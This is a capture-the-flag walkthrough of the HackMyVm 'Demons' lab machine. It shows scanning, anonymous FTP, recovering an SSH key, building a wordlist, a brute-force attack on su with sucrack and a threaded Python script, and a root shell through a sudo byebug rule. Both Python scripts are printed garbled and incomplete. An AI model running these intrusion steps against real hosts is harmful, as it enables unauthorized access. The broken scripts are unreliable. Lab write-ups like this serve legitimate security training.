HackMyVm Demons Walkthrough

HackMyVm Demons Walkthrough


Find IP of the machine.

 ~ sudo arp-scan --interface eth1                             
 ...  08:00:27:71:4c:b6       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p-  -oN ports.log   
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
 Nmap scan report for
 Host is up (0.00090s latency).
 Not shown: 65532 closed ports
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
 |   256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
 |_  256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
 80/tcp open  http    Apache httpd 2.4.48 ((Debian))
 |_http-server-header: Apache/2.4.48 (Debian)
 |_http-title:  DemonsCloseCall
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Login ftp anonymous, download DemonsVBAMacroTools.mdb.

 ftp> cd .toolsHidden
 250 Directory successfully changed.
 ftp> ls -la
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 drwxrwxrwx    2 0        0            4096 Sep 16 15:17 .
 drwxr-xr-x    3 0        115          4096 Sep 16 15:18 ..
 -rw-r--r--    1 0        0              55 Sep 10 17:21 .what
 -rw-------    1 1000     1000        12018 Sep 10 17:19 DemonsCellsDogma.xlsx
 -rwxrwxrwx    1 1000     1000       339968 Sep 16 15:17 DemonsVBAMacroTools.mdb

Use Access to open it, there is a VBA module which is password protected.

Google the way to bypass the password. Then we can view the source code.

Save the ssh key to key.txt.

Enum port 80. At http://ip/hell, get 2 usernames.

Try login as aim with the private key.

 ~ ssh aim@ -i key.txt      
 Last login: Tue Sep 21 04:52:35 2021 from
 aim@Demons:~$ id
 uid=1001(aim) gid=1001(aim) groups=1001(aim)

Found an image in /home/aim, named key8_8.jpg. This the the hint for password of another user agares.

Check the keyboard image, "34odfnm" is different. This means the dic contains only these 7 letters/numbers.

8_8 may means password length is 8. We should use "crunch 8 8"

So, first we generate a dic with crunch, which contains 5764801 words.

 ~ crunch 8 8 dfnmo34 > tmp.txt                               
 Crunch will now generate the following amount of data: 51883209 bytes
 49 MB
 0 GB
 0 TB
 0 PB
 Crunch will now generate the following number of lines: 5764801

Because the password contain's all 7 letter/numbers, so there is one and only one letter/number appears twice.

Then we use a script to make the dic smaller. (Thanks avijneyam#8394 for the script )

 with open("tmp.txt") as f:
     lines = f.read().splitlines()
 data = []
 for line in lines:
     uline = list(set([i for i in line]))
     counts = []
     for char in uline:
     if counts[-1] == 2 and counts[-2] == 1:
 data = "\n".join(data)
 with open("dic.txt", "w") as f1:

The new dic contains only 141119 words. (Also a big one.)

 ~ wc -l dic.txt
 141119 dic.txt

Then we need to brute force su to get the right password of agares.

There is a tool named sucrack at github.


sucarck  takes about 18 mins. (With 100 threads. Too many threads causes error.)

 aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt 
 password is: xxxxxxxx
 real    18m19.760s
 user    11m7.012s
 sys     4m59.095s

We can also make a python script to do the bruteforce. But the speed is mush slower than sucrack.

import threading
from subprocess import PIPE,STDOUT,Popen

threads = []
t_nums = 100  #number of threads

global correct_pass
correct_pass = ""
global current  #current count of passwords
current = 0
global total  #total count of passwords
total = 0

def crack_thread(*pass_list):
    #threads of cracking su
    global correct_pass
    global current
    global total
    for pwd in pass_list:
        if(len(correct_pass) > 0):  #correct_pass has been found, exit thread
        current += 1
        p = Popen(['su','agares'],stdin=PIPE,stdout=PIPE,stderr=STDOUT)
        if(str(res).find("agares")) != -1:
            print(f"\nPassword is {pwd}\n")
            correct_pass = pwd

with open('mini.txt','r') as passfile:
    passes = passfile.readlines()
    total = len(passes)

    t_size = total // t_nums  #passwords count of each thread
    t_last = total % t_nums   #if mod is not 0, there will be another thread

    for i in range(t_nums):
        passblk = passes[i*t_size:(i+1)*t_size]
    if t_last>0:
        passblk = passes[t_size*t_nums:]
    for t in threads:
    for t in threads:
aim@Demons:~$ time python3 mt.py
Password is xxxxxxxx

real    185m22.898s
user    98m29.009s
sys     62m7.093s

Check sudo -l as user agares.

agares@Demons:/home/aim$ sudo -l
[sudo] password di agares:
Corrispondenza voci Defaults per agares su Demons:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L'utente agares può eseguire i seguenti comandi su Demons:
    (ALL : ALL) /bin/byebug

It's easy to get root now.

agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb

[1, 1] in /home/agares/tmp.rb                     
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) gruppi=0(root)



Powered By Z-BlogPHP 1.7.2